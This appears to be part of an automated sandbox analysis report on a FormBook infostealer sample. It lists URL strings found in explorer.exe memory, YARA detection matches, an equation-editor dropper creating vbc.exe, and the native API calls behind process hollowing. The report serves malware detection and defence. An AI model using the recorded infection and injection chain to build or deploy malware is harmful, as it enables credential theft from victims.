          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpl
          Source: explorer.exe, 00000006.00000000.2094875114.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2101707884.000000000839A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000006.00000000.2102194085.000000000856E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.2102099467.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,4_2_00220110
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181C0 NtCreateFile,5_2_004181C0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418270 NtReadFile,5_2_00418270
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182F0 NtClose,5_2_004182F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,5_2_004183A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181BA NtCreateFile,5_2_004181BA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041826A NtReadFile,5_2_0041826A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182EB NtClose,5_2_004182EB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,5_2_008E00C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_008E0048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,5_2_008E0078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,5_2_008E07AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,5_2_008DF9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,5_2_008DF900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_008DFAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_008DFAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_008DFBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_008DFB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_008DFC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_008DFC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,5_2_008DFD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_008DFDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_008DFEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_008DFED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,5_2_008DFFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E10D0 NtOpenProcessToken,5_2_008E10D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0060 NtQuerySection,5_2_008E0060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E01D4 NtSetValueKey,5_2_008E01D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E010C NtOpenDirectoryObject,5_2_008E010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1148 NtOpenThread,5_2_008E1148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF8CC NtWaitForSingleObject,5_2_008DF8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF938 NtWriteFile,5_2_008DF938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1930 NtSetContextThread,5_2_008E1930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAB8 NtQueryValueKey,5_2_008DFAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFA20 NtQueryInformationFile,5_2_008DFA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFA50 NtEnumerateValueKey,5_2_008DFA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBE8 NtQueryVirtualMemory,5_2_008DFBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFB50 NtCreateKey,5_2_008DFB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC30 NtOpenProcess,5_2_008DFC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC48 NtSetInformationFile,5_2_008DFC48
